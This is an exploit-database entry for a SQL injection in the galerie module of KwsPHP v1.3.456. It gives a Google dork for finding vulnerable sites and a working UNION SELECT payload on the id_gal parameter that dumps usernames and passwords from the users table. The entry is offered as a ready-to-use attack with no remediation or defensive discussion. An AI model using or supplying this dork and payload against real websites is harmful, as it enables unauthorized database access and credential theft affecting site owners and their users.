id: 2803
date: 04/02/2008
title: KwsPHP Module Galerie (id_gal) Remote SQL Injection Vulnerability
author: S@BUN
cves: 

=================================================================
KwsPHP Module Galerie (id_gal) Remote SQL Injection Vulnerability
=================================================================



##########################################
#
# KwsPHP v1.3.456 (galerie)SQL Injection
#
###########################################
#
# DORK 1 : allinurl: "index.php?mod=galerie"action=gal
#
###########################################
EXPLOiT :

index.php?mod=galerie&action=gal&id_gal=-99999/**/union/**/select/**/0,1,concat(pseudo,0x3a,pass),concat(pseudo,0x3a,pass),4,5,6,7/**/from/**/users/*


###########################################



#  0day.today [2023-03-23]  #